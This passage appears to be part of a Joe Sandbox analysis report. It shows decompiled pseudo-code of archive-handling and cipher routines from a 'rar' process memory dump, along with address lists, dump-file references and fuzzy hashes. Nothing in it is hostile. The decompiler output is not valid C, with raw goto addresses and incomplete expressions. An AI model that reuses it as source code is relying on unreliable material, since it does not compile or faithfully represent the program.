				 *_t436 =  *(0x7ff650b10000 + 0x9bff0 + _t397 * 4) ^  *(0x7ff650b10000 + 0x9c3f0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9c7f0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9cbf0 + _t384 * 4);
				 *_t458 =  *(0x7ff650b10000 + 0x9cbf0 + _t397 * 4) ^  *(0x7ff650b10000 + 0x9bff0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9c3f0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9c7f0 + _t384 * 4);
				_t458[1] =  *(0x7ff650b10000 + 0x9c7f0 + _t397 * 4) ^  *(0x7ff650b10000 + 0x9cbf0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9bff0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9c3f0 + _t384 * 4);
				_t458[2] =  *(0x7ff650b10000 + 0x9c3f0 + _t397 * 4) ^  *(0x7ff650b10000 + 0x9c7f0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9cbf0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9bff0 + _t384 * 4);
				_t378 = r12d - _t397 - 1;
				if (_t378 < 0) goto 0x50b55096;
				_t386 =  *(__rcx + 4) << 4;
				_t164 = _t445 + 8; // -2708
				_t399 = _t164 + _t386;
				r12d = 4;
				 *(_t399 +  &_v72 - _t399) =  *(_t436 - _t164 + _t386 + _t164 + _t386) ^  *(_t164 + _t386);
				if (_t378 != 0) goto 0x50b551bb;
				_t170 = _t445 + 0x18; // -2692
				r12d = 4;
				 *_t436 =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				 *((char*)(_t458 - 3)) =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				 *((char*)(_t458 - 2)) =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				 *((char*)(_t458 - 1)) =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				 *_t458 =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[0] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[0] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[0] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[1] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[1] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[1] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[1] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[2] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[2] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[2] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				_t458[2] =  *((intOrPtr*)(0x7ff650b10000 + 0x9bff1 + _t386 * 4));
				 *_t436 =  *_t436 ^  *(_t170 + ( *(__rcx + 4) << 4) - _t436 + _t436);
				if (_t378 != 0) goto 0x50b552e1;
				if (_t378 != 0) goto 0x50b54f4f;
				_t443 = _a24;
				_t324 =  *((intOrPtr*)(_t436 - _t443 + _t443));
				 *_t443 = _t324;
				if (_t450 != 0) goto 0x50b5531b;
				return _t324;
			}














































                                                                                                            0x7ff650b54ec4
                                                                                                            0x7ff650b54ec4
                                                                                                            0x7ff650b54ec7
                                                                                                            0x7ff650b54ecd
                                                                                                            0x7ff650b54ed2
                                                                                                            0x7ff650b54ed7
                                                                                                            0x7ff650b54edd
                                                                                                            0x7ff650b54eef
                                                                                                            0x7ff650b54ef2
                                                                                                            0x7ff650b54ef6
                                                                                                            0x7ff650b54efc
                                                                                                            0x7ff650b54eff
                                                                                                            0x7ff650b54f04
                                                                                                            0x7ff650b54f09
                                                                                                            0x7ff650b54f0e
                                                                                                            0x7ff650b54f0e
                                                                                                            0x7ff650b54f12
                                                                                                            0x7ff650b54f18
                                                                                                            0x7ff650b54f22
                                                                                                            0x7ff650b54f36
                                                                                                            0x7ff650b54f36
                                                                                                            0x7ff650b54f41
                                                                                                            0x7ff650b54f44
                                                                                                            0x7ff650b54f4f
                                                                                                            0x7ff650b54f54
                                                                                                            0x7ff650b54f56
                                                                                                            0x7ff650b54f65
                                                                                                            0x7ff650b54f68
                                                                                                            0x7ff650b54f6b
                                                                                                            0x7ff650b54f6f
                                                                                                            0x7ff650b54f71
                                                                                                            0x7ff650b54f73
                                                                                                            0x7ff650b54f76
                                                                                                            0x7ff650b54f8a
                                                                                                            0x7ff650b54f93
                                                                                                            0x7ff650b54f9e
                                                                                                            0x7ff650b54fa4
                                                                                                            0x7ff650b54fa4
                                                                                                            0x7ff650b54fac
                                                                                                            0x7ff650b54fe2
                                                                                                            0x7ff650b55015
                                                                                                            0x7ff650b55048
                                                                                                            0x7ff650b55074
                                                                                                            0x7ff650b5507f
                                                                                                            0x7ff650b55082
                                                                                                            0x7ff650b55088
                                                                                                            0x7ff650b55096
                                                                                                            0x7ff650b550a4
                                                                                                            0x7ff650b550a7
                                                                                                            0x7ff650b550af
                                                                                                            0x7ff650b550b5
                                                                                                            0x7ff650b550f0
                                                                                                            0x7ff650b55123
                                                                                                            0x7ff650b55156
                                                                                                            0x7ff650b55182
                                                                                                            0x7ff650b5518d
                                                                                                            0x7ff650b55190
                                                                                                            0x7ff650b551a1
                                                                                                            0x7ff650b551a5
                                                                                                            0x7ff650b551a9
                                                                                                            0x7ff650b551b2
                                                                                                            0x7ff650b551c0
                                                                                                            0x7ff650b551cc
                                                                                                            0x7ff650b551d9
                                                                                                            0x7ff650b551dd
                                                                                                            0x7ff650b551ed
                                                                                                            0x7ff650b551fb
                                                                                                            0x7ff650b5520a
                                                                                                            0x7ff650b55219
                                                                                                            0x7ff650b55228
                                                                                                            0x7ff650b55236
                                                                                                            0x7ff650b55245
                                                                                                            0x7ff650b55254
                                                                                                            0x7ff650b55263
                                                                                                            0x7ff650b55272
                                                                                                            0x7ff650b55281
                                                                                                            0x7ff650b55290
                                                                                                            0x7ff650b5529f
                                                                                                            0x7ff650b552ae
                                                                                                            0x7ff650b552bd
                                                                                                            0x7ff650b552cf
                                                                                                            0x7ff650b552e5
                                                                                                            0x7ff650b552ee
                                                                                                            0x7ff650b5530b
                                                                                                            0x7ff650b55311
                                                                                                            0x7ff650b5531b
                                                                                                            0x7ff650b5531f
                                                                                                            0x7ff650b55329
                                                                                                            0x7ff650b55348

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e2701e2f7f025be64db4c0d3572a8e7eec9b25edb65809bb5df1a453ff70250c
                                                                                                            • Instruction ID: 2e727c020035ecadaa2d6853d0af245a035f3edc1a47a92f0a78886f7b007e5b
                                                                                                            • Opcode Fuzzy Hash: e2701e2f7f025be64db4c0d3572a8e7eec9b25edb65809bb5df1a453ff70250c
                                                                                                            • Instruction Fuzzy Hash: F4D19177A181D18EE302CB7A94A88FC3FB0E35974CB898151DF956374AD63ED206CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B4FFC8 Relevance: .3, Instructions: 256COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E00007FF67FF650B4FFC8(void* __edx, void* __eflags, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi) {
				void* _t126;
				signed int _t130;
				void* _t146;
				void* _t167;
				signed long long _t168;
				signed long long _t169;
				signed long long _t175;
				signed long long _t176;
				signed long long _t178;
				intOrPtr* _t185;
				void* _t209;
				void* _t221;
				intOrPtr _t226;
				char* _t239;
				long long _t243;
				signed long long _t244;
				void* _t245;
				void* _t247;
				void* _t248;
				void* _t250;
				signed long long _t251;
				void* _t264;
				void* _t266;
				intOrPtr _t267;
				void* _t272;
				long long _t273;
				void* _t279;
				signed long long _t281;
				long long _t287;
				long long _t289;

				_t243 = __rsi;
				_t221 = __rdx;
				_t167 = _t250;
				 *((long long*)(_t167 + 0x10)) = __rbx;
				 *((long long*)(_t167 + 0x18)) = __rsi;
				 *((long long*)(_t167 + 0x20)) = __rdi;
				_t4 = _t167 - 0xe8; // 0x6b0
				_t248 = _t4;
				_t251 = _t250 - 0x1c0;
				_t168 =  *0x50b978f0; // 0x27db226282f1
				_t169 = _t168 ^ _t251;
				 *(_t248 + 0xb0) = _t169;
				_t185 = __rcx;
				E00007FF67FF650B164E4(0x68);
				E00007FF67FF650B320B8(_t185,  *_t185, __rsi, _t287);
				 *(_t251 + 0x78) = _t169;
				E00007FF67FF650B15E84(E00007FF67FF650B15E84(E00007FF67FF650B52FB8(_t130, _t185,  *_t185, _t221, 0x7fffffff), _t185 + 0x80), _t185 + 0xa8);
				r8d = 0;
				 *0x50b80550(_t279, _t272, _t266, _t247);
				_t10 = _t248 - 0x80; // 0x630
				E00007FF67FF650B11344( *((intOrPtr*)( *((intOrPtr*)( *_t185)) + 0x20)), _t10);
				r15d = 0;
				 *((long long*)(_t251 + 0x28)) = _t287;
				E00007FF67FF650B5B008();
				E00007FF67FF650B52FB8(_t130, _t185,  *_t185, _t221, _t169);
				r14d = 0;
				_t267 =  *((intOrPtr*)(_t248 - 0x80));
				_t273 =  *0x50b80550();
				goto 0x50b5038f;
				if (_t273 == 0) goto 0x50b5032f;
				_t239 = _t267 + 2;
				_t289 = _t287 - _t267 - _t279;
				 *((long long*)(_t251 + 0x68)) = _t289;
				 *((long long*)(_t251 + 0x20)) = _t273;
				if ( *((char*)(_t239 - 2)) != 0x7b) goto 0x50b50305;
				if ( *((char*)(_t239 - 1)) != 0x52) goto 0x50b50305;
				if ( *_t239 != 0x42) goto 0x50b50305;
				if ( *((char*)(_t239 + 1)) != 0x7d) goto 0x50b50305;
				if ( *((char*)(_t239 + 0x12)) != 1) goto 0x50b50305;
				 *((char*)(_t239 - 2)) = 0;
				 *0x50b80550();
				 *((long long*)(_t251 + 0x70)) =  *((intOrPtr*)( *((intOrPtr*)( *_t185)) + 0x28));
				E00007FF67FF650B48A20( *((intOrPtr*)( *((intOrPtr*)( *_t185)) + 0x28)), _t248,  *_t185);
				_t27 = _t248 + 0x50; // 0x700
				if (E00007FF67FF650B510CC(_t130, 0x68, 0, _t146, _t185, _t27, _t248) == 0) goto 0x50b502e3;
				_t281 =  *((intOrPtr*)(_t248 + 0xa8));
				 *(_t251 + 0x40) = _t281;
				_t175 =  *((intOrPtr*)(_t248 + 0x70));
				 *(_t251 + 0x48) = _t175;
				 *((intOrPtr*)(_t251 + 0x58)) =  *((intOrPtr*)(_t248 + 0xa0));
				 *(_t251 + 0x50) = _t239 - 2 + _t289;
				asm("movups xmm0, [esp+0x40]");
				asm("movaps [ebp-0x20], xmm0");
				asm("movups xmm1, [esp+0x50]");
				asm("movaps [ebp-0x10], xmm1");
				_t35 = _t248 - 0x20; // 0x690
				E00007FF67FF650B50DDC(_t185, _t185 + 0x80, _t35);
				_t226 =  *((intOrPtr*)(_t185 + 0x100));
				if (_t226 == 0) goto 0x50b501be;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t185 + 0xf8)) + _t175 * 8)) == _t281) goto 0x50b501c9;
				if (_t175 - _t226 < 0) goto 0x50b501af;
				E00007FF67FF650B50E20(_t185, _t185 + 0xf8, _t281);
				r8d =  *((intOrPtr*)(_t248 + 0x60));
				r8d = r8d -  *((intOrPtr*)(_t248 + 0x64));
				E00007FF67FF650B4E7F4(_t185, _t281);
				r8d =  *((intOrPtr*)(_t248 + 0x78));
				E00007FF67FF650B4E7F4(_t185, _t281);
				r14d = 0;
				if ( *((intOrPtr*)(_t248 + 0x98)) == 0) goto 0x50b5029d;
				_t176 =  *((intOrPtr*)(_t248 + 0xa8));
				 *(_t251 + 0x40) = _t176;
				E00007FF67FF650B48AE4( *((intOrPtr*)(_t248 + 0x98)), _t176, _t185, _t248);
				 *(_t251 + 0x48) = _t176;
				_t178 = _t176 *  *(_t248 + 0x88) +  *((intOrPtr*)(_t248 + 0x70));
				 *(_t251 + 0x50) = _t178;
				 *((long long*)(_t251 + 0x58)) = 0x7fffffff;
				_t136 =  ==  ?  *((void*)(_t248 + 0x78)) :  *((intOrPtr*)(_t248 + 0x60)) -  *((intOrPtr*)(_t248 + 0x64));
				 *((intOrPtr*)(_t251 + 0x60)) =  ==  ?  *((void*)(_t248 + 0x78)) :  *((intOrPtr*)(_t248 + 0x60)) -  *((intOrPtr*)(_t248 + 0x64));
				asm("movups xmm0, [esp+0x40]");
				asm("movaps [ebp-0x50], xmm0");
				asm("movups xmm1, [esp+0x50]");
				asm("movaps [ebp-0x40], xmm1");
				asm("movsd xmm0, [esp+0x60]");
				asm("movsd [ebp-0x30], xmm0");
				_t56 = _t248 - 0x50; // 0x660
				E00007FF67FF650B50D90(_t185, _t185 + 0xa8, _t56);
				r14d = r14d + 1;
				if (r14d -  *((intOrPtr*)(_t248 + 0x98)) < 0) goto 0x50b50206;
				if (_t243 != 0) goto 0x50b502bc;
				_t244 = _t178 *  *(_t248 + 0x90);
				if ( *((intOrPtr*)(_t185 + 0xb0)) - _t244 <= 0) goto 0x50b502de;
				E00007FF67FF650B5142C(_t185, _t185,  *((intOrPtr*)(_t185 + 0xf8)), _t264);
				_t209 =  *((intOrPtr*)(_t185 + 0xb0)) +  *((intOrPtr*)(_t185 + 0xb0));
				_t245 =  <  ? _t209 : _t244;
				r8d = 0;
				 *0x50b80550();
				E00007FF67FF650B11534(_t248);
				 *((long long*)(_t251 + 0x20)) =  *((intOrPtr*)(_t251 + 0x20)) - 1;
				if (_t244 != _t209) goto 0x50b500dc;
				 *((long long*)(_t251 + 0x28)) =  *((intOrPtr*)(_t251 + 0x28)) +  *((intOrPtr*)(_t251 + 0x30));
				E00007FF67FF650B5B008();
				E00007FF67FF650B52FB8(_t130, _t185,  *_t185,  *((intOrPtr*)(_t251 + 0x28)) +  *((intOrPtr*)(_t251 + 0x30)),  *(_t251 + 0x78));
				_t285 =  >  ?  *((intOrPtr*)( *((intOrPtr*)( *_t185)) + 0x20)) :  *((intOrPtr*)(_t251 + 0x38));
				E00007FF67FF650B6BAF0();
				_t126 =  *0x50b80550();
				 *((long long*)(_t251 + 0x38)) = 0x40 + ( >  ?  *((intOrPtr*)( *((intOrPtr*)( *_t185)) + 0x20)) :  *((intOrPtr*)(_t251 + 0x38)));
				 *((long long*)(_t251 + 0x30)) = 0x40;
				if (_t126 != 0) goto 0x50b500b4;
				E00007FF67FF650B5142C(_t185, _t185,  *((intOrPtr*)(_t248 - 0x78)) - ( >  ?  *((intOrPtr*)( *((intOrPtr*)( *_t185)) + 0x20)) :  *((intOrPtr*)(_t251 + 0x38))), _t264);
				_t87 = _t248 - 0x80; // 0x630
				return E00007FF67FF650B69D10(E00007FF67FF650B11534(_t87),  *((intOrPtr*)(_t248 + 0x60)),  *(_t248 + 0xb0) ^ _t251);
			}

































                                                                                                            0x7ff650b4ffc8
                                                                                                            0x7ff650b4ffc8
                                                                                                            0x7ff650b4ffc8
                                                                                                            0x7ff650b4ffcb
                                                                                                            0x7ff650b4ffcf
                                                                                                            0x7ff650b4ffd3
                                                                                                            0x7ff650b4ffe0
                                                                                                            0x7ff650b4ffe0
                                                                                                            0x7ff650b4ffe7
                                                                                                            0x7ff650b4ffee
                                                                                                            0x7ff650b4fff5
                                                                                                            0x7ff650b4fff8
                                                                                                            0x7ff650b4ffff
                                                                                                            0x7ff650b50007
                                                                                                            0x7ff650b5000f
                                                                                                            0x7ff650b50017
                                                                                                            0x7ff650b50043
                                                                                                            0x7ff650b50052
                                                                                                            0x7ff650b5005a
                                                                                                            0x7ff650b50067
                                                                                                            0x7ff650b5006b
                                                                                                            0x7ff650b50071
                                                                                                            0x7ff650b50074
                                                                                                            0x7ff650b50079
                                                                                                            0x7ff650b50086
                                                                                                            0x7ff650b5008b
                                                                                                            0x7ff650b50098
                                                                                                            0x7ff650b500ac
                                                                                                            0x7ff650b500af
                                                                                                            0x7ff650b500b7
                                                                                                            0x7ff650b500bd
                                                                                                            0x7ff650b500c5
                                                                                                            0x7ff650b500c8
                                                                                                            0x7ff650b500d0
                                                                                                            0x7ff650b500e0
                                                                                                            0x7ff650b500ea
                                                                                                            0x7ff650b500f3
                                                                                                            0x7ff650b500fd
                                                                                                            0x7ff650b50107
                                                                                                            0x7ff650b5010d
                                                                                                            0x7ff650b5011b
                                                                                                            0x7ff650b50121
                                                                                                            0x7ff650b5012d
                                                                                                            0x7ff650b5013e
                                                                                                            0x7ff650b5014f
                                                                                                            0x7ff650b50155
                                                                                                            0x7ff650b5015c
                                                                                                            0x7ff650b50161
                                                                                                            0x7ff650b50165
                                                                                                            0x7ff650b50170
                                                                                                            0x7ff650b50174
                                                                                                            0x7ff650b50179
                                                                                                            0x7ff650b5017e
                                                                                                            0x7ff650b50182
                                                                                                            0x7ff650b50187
                                                                                                            0x7ff650b5018b
                                                                                                            0x7ff650b50196
                                                                                                            0x7ff650b5019d
                                                                                                            0x7ff650b501a7
                                                                                                            0x7ff650b501b3
                                                                                                            0x7ff650b501bc
                                                                                                            0x7ff650b501c4
                                                                                                            0x7ff650b501c9
                                                                                                            0x7ff650b501cd
                                                                                                            0x7ff650b501d7
                                                                                                            0x7ff650b501dc
                                                                                                            0x7ff650b501e6
                                                                                                            0x7ff650b501eb
                                                                                                            0x7ff650b501f6
                                                                                                            0x7ff650b50206
                                                                                                            0x7ff650b5020d
                                                                                                            0x7ff650b50216
                                                                                                            0x7ff650b5021b
                                                                                                            0x7ff650b5022b
                                                                                                            0x7ff650b5022f
                                                                                                            0x7ff650b50234
                                                                                                            0x7ff650b5024a
                                                                                                            0x7ff650b5024e
                                                                                                            0x7ff650b50252
                                                                                                            0x7ff650b50257
                                                                                                            0x7ff650b5025b
                                                                                                            0x7ff650b50260
                                                                                                            0x7ff650b50264
                                                                                                            0x7ff650b5026a
                                                                                                            0x7ff650b5026f
                                                                                                            0x7ff650b5027a
                                                                                                            0x7ff650b5027f
                                                                                                            0x7ff650b5028b
                                                                                                            0x7ff650b502a0
                                                                                                            0x7ff650b502b9
                                                                                                            0x7ff650b502c3
                                                                                                            0x7ff650b502c8
                                                                                                            0x7ff650b502d4
                                                                                                            0x7ff650b502da
                                                                                                            0x7ff650b502e9
                                                                                                            0x7ff650b502f5
                                                                                                            0x7ff650b50300
                                                                                                            0x7ff650b5030c
                                                                                                            0x7ff650b50311
                                                                                                            0x7ff650b50332
                                                                                                            0x7ff650b50337
                                                                                                            0x7ff650b50345
                                                                                                            0x7ff650b50355
                                                                                                            0x7ff650b50368
                                                                                                            0x7ff650b50382
                                                                                                            0x7ff650b50391
                                                                                                            0x7ff650b50396
                                                                                                            0x7ff650b5039b
                                                                                                            0x7ff650b503a4
                                                                                                            0x7ff650b503aa
                                                                                                            0x7ff650b503e2

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 747df39908a3b3124df33e05d4aa27e77422ff723e8ef3fa143f22d57e504578
                                                                                                            • Instruction ID: 18f1521ca1636b0f7cd72050d8a567d55799a245ceab628113d3809fb260c18a
                                                                                                            • Opcode Fuzzy Hash: 747df39908a3b3124df33e05d4aa27e77422ff723e8ef3fa143f22d57e504578
                                                                                                            • Instruction Fuzzy Hash: C0B1C536618B8296EB10DF35E4802AD77B1FB8AB88F084135EE4EA7B59DF39D545C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B61C18 Relevance: .3, Instructions: 254COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E00007FF67FF650B61C18(void* __rcx, intOrPtr* __rdx, void* __r8, void* __r9, void* __r10) {
				void* __rbx;
				void* _t69;
				void* _t78;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t113;
				void* _t116;
				char _t117;
				signed int _t118;
				signed int _t122;
				signed int _t143;
				void* _t183;
				signed long long _t191;
				signed long long _t192;
				intOrPtr* _t193;
				signed long long _t201;
				unsigned long long _t214;
				signed long long _t215;
				void* _t223;
				void* _t225;
				signed long long _t226;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;

				_t235 = __r10;
				_t224 = _t225 - 0x100;
				_t226 = _t225 - 0x200;
				_t191 =  *0x50b978f0; // 0x27db226282f1
				_t192 = _t191 ^ _t226;
				 *(_t225 - 0x100 + 0xf0) = _t192;
				_t236 = __r9;
				_t193 = __rdx;
				_t237 = __rcx;
				if ( *((char*)(__r8 + 0x11)) == 0) goto 0x50b61f83;
				if ( *((char*)(__rdx + 8)) != 0) goto 0x50b61c77;
				_t69 =  *((intOrPtr*)(__rcx + 0xe8)) - 0x19;
				if ( *__rdx - _t69 <= 0) goto 0x50b61c77;
				0x50b62db8();
				if (_t69 == 0) goto 0x50b61f18;
				r15d = r15d | 0xffffffff;
				E00007FF67FF650B36324(__rdx);
				E00007FF67FF650B3630C(4, _t193);
				if (sil != 0xf) goto 0x50b61cea;
				_t143 = E00007FF67FF650B36324(_t193) >> 0x0000000c & 0x000000ff;
				E00007FF67FF650B3630C(4, _t193);
				if (_t143 != 0) goto 0x50b61cc3;
				 *((char*)(_t226 + _t223 + 0x20)) = 0xf;
				goto 0x50b61cef;
				if (0 - 0x14 >= 0) goto 0x50b61ce5;
				if (_t192 - 0x14 >= 0) goto 0x50b61fa6;
				 *((char*)(_t226 + _t192 + 0x20)) = 0;
				if (_t143 + 2 + r15d != 0) goto 0x50b61cc6;
				goto 0x50b61cef;
				 *((intOrPtr*)(_t226 + _t223 + 0x20)) = sil;
				if (1 + r15d + 1 - 0x14 < 0) goto 0x50b61c7d;
				_t12 = _t236 + 0x3bb0; // 0x3bc3
				_t238 = _t12;
				r9d = 0x14;
				E00007FF67FF650B605A8(_t193, _t226 + 0x20, _t238);
				_t14 = _t223 + 0x10; // 0x10
				r11d = _t14;
				if ( *((char*)(_t193 + 8)) != 0) goto 0x50b61d43;
				_t78 =  *((intOrPtr*)(_t237 + 0xe8)) - 5;
				if ( *_t193 - _t78 <= 0) goto 0x50b61d43;
				0x50b62db8();
				if (_t78 == 0) goto 0x50b61f18;
				r11d = 0x10;
				_t201 =  *((intOrPtr*)(_t193 + 0x10));
				_t214 =  *_t193;
				r10d =  *(_t193 + 4);
				r8d =  *(_t201 + _t214 + 1) & 0x000000ff;
				r8d = r8d | ( *(_t201 + _t214) & 0x000000ff) << 0x00000008;
				r8d = r8d << 8;
				r8d = r8d |  *(_t201 + _t214 + 2) & 0x000000ff;
				r8d = r8d >> 8 - r10d;
				r8d = r8d & 0x0000fffe;
				if (r8d -  *((intOrPtr*)(_t238 + 4 + _t201 * 4)) >= 0) goto 0x50b61dbb;
				_t215 = _t214 >> r11d -  *((intOrPtr*)(_t238 + 0x84));
				_t113 = ( *(_t215 + _t238 + 0x88) & 0x000000ff) + r10d;
				 *_t193 =  *_t193 + (_t113 >> 3);
				 *(_t193 + 4) = _t113 & 0x00000007;
				goto 0x50b61e24;
				r9d = 0xf;
				_t116 = ( *(_t238 + 0x488 + _t215 * 2) & 0x0000ffff) + 1;
				if (_t116 - r9d >= 0) goto 0x50b61de6;
				if (r8d -  *((intOrPtr*)(_t238 + (_t215 + 1) * 4)) < 0) goto 0x50b61de3;
				_t117 = _t116 + 1;
				if (_t117 - r9d < 0) goto 0x50b61dd1;
				goto 0x50b61de6;
				r9d = _t117;
				_t118 = _t235 + __r9;
				 *_t193 =  *_t193 + (_t118 >> 3);
				 *(_t193 + 4) = _t118 & 0x00000007;
				r8d = r8d -  *((intOrPtr*)(_t238 + 4 + _t192 * 4));
				r8d = r8d >> r11d - r9d;
				asm("sbb eax, eax");
				_t122 =  *(_t238 + 0xc88 + _t192 * 2) & 0x0000ffff;
				if (_t122 - r11w >= 0) goto 0x50b61e35;
				 *(_t226 + _t223 + 0x40) = _t122;
				goto 0x50b61ef3;
				if (_t122 - 0x12 >= 0) goto 0x50b61e97;
				if (_t122 != r11w) goto 0x50b61e58;
				E00007FF67FF650B36324(_t193);
				goto 0x50b61e6a;
				_t92 = E00007FF67FF650B36324(_t193);
				E00007FF67FF650B3630C(7, _t193);
				if (1 == 0) goto 0x50b61f18;
				if (1 - 0x1ae >= 0) goto 0x50b61eff;
				 *(_t226 + _t223 + 0x40) =  *((intOrPtr*)(_t226 + _t192 + 0x40));
				_t183 = (_t92 >> 9) + 0xb - 1;
				if (_t183 != 0) goto 0x50b61e7a;
				goto 0x50b61eed;
				if (_t183 != 0) goto 0x50b61eb0;
				E00007FF67FF650B36324(_t193);
				goto 0x50b61ec2;
				_t97 = E00007FF67FF650B36324(_t193);
				E00007FF67FF650B3630C(7, _t193);
				if (1 - 0x1ae >= 0) goto 0x50b61eff;
				if (_t192 - 0x1ae >= 0) goto 0x50b61fa6;
				 *((char*)(_t226 + _t192 + 0x40)) = 0;
				if ((_t97 >> 9) + 0xb - 1 != 0) goto 0x50b61eca;
				r11d = 0x10;
				if (3 - 0x1ae < 0) goto 0x50b61d19;
				 *((char*)(_t237 + 0xe8ae)) = 1;
				if ( *((char*)(_t193 + 8)) != 0) goto 0x50b61f1c;
				if ( *_t193 -  *((intOrPtr*)(_t237 + 0xe8)) <= 0) goto 0x50b61f1c;
				goto 0x50b61f85;
				r9d = 0x132;
				E00007FF67FF650B605A8(_t193, _t226 + 0x40, __r9);
				_t61 = _t236 + 0xeec; // 0xeff
				r9d = 0x40;
				E00007FF67FF650B605A8(_t193, _t225 - 0x100 + 0x72, _t61);
				_t63 = _t236 + 0x1dd8; // 0x1deb
				r9d = 0x10;
				E00007FF67FF650B605A8(_t193, _t224 + 0xb2, _t63);
				_t65 = _t236 + 0x2cc4; // 0x2cd7
				r9d = 0x2c;
				E00007FF67FF650B605A8(_t193, _t224 + 0xc2, _t65);
				return E00007FF67FF650B69D10(1, _t122,  *(_t224 + 0xf0) ^ _t226);
			}




























                                                                                                            0x7ff650b61c18
                                                                                                            0x7ff650b61c23
                                                                                                            0x7ff650b61c2b
                                                                                                            0x7ff650b61c32
                                                                                                            0x7ff650b61c39
                                                                                                            0x7ff650b61c3c
                                                                                                            0x7ff650b61c48
                                                                                                            0x7ff650b61c4b
                                                                                                            0x7ff650b61c4e
                                                                                                            0x7ff650b61c51
                                                                                                            0x7ff650b61c5b
                                                                                                            0x7ff650b61c63
                                                                                                            0x7ff650b61c68
